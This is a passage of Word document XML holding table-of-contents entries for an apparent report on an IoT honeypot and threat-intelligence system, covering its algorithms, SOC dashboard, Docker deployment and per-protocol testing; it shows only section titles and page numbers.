              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69019" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A2 – Authentication Gate with Brute-Force Delay</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69019 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">48</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69020" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A3 – High-Interaction Fake Shell</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69020 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">48</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69021" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A4 – MQTT Packet Parsing and Device Control</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69021 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">49</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69022" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A5 – RTSP Authentication (Basic and Digest)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69022 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">50</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69023" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A6 – Detection Pass and De-duplicated Storage</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69023 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">50</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69024" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A7 – Attacker Correlation, Threat Score and Campaigns</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69024 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">51</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69025" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A8 – Alert Notification with Threshold, De-duplication and Escalation</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69025 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">52</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69026" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">7.2 External APIs / SDKs</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69026 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">52</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69027" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">7.3 User Interface</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69027 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">55</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69028" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard (Analyst-Facing)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69028 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">55</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69029" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Protocol Sessions (Attacker-Facing)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69029 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">59</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69030" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">7.4 Deployment</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69030 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">62</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69031" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Container Architecture</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69031 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">62</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69032" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker Compose Configuration</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69032 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">64</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69033" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Deployment Steps</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69033 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">64</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69034" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Running Without Docker</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69034 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">66</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69035" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Testing and Evaluation</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69035 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">66</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69036" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.1 Unit Testing</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69036 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">67</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69037" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69037 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">68</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69038" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Telnet Honeypot (Industrial Sensor)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69038 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">69</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69039" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypots (CCTV Camera, Smart Lock API, Sensor HMI)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69039 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">70</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69040" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">MQTT Honeypot (IoT Broker)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69040 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">71</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69041" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Honeypot (CCTV Camera)</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69041 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">72</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69042" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.2 Functional Testing</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69042 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">73</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69043" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Intelligence Engine</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69043 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">73</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69044" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69044 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">77</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69045" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">8.3 Business Rules Testing</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69045 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">77</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69046" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Brute-Force Detection</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69046 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">78</w:t>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc69047" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-Protocol Attack Detection</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText xml:space="preserve"> PAGEREF _Toc69047 \h </w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t xml:space="preserve">79</w:t>
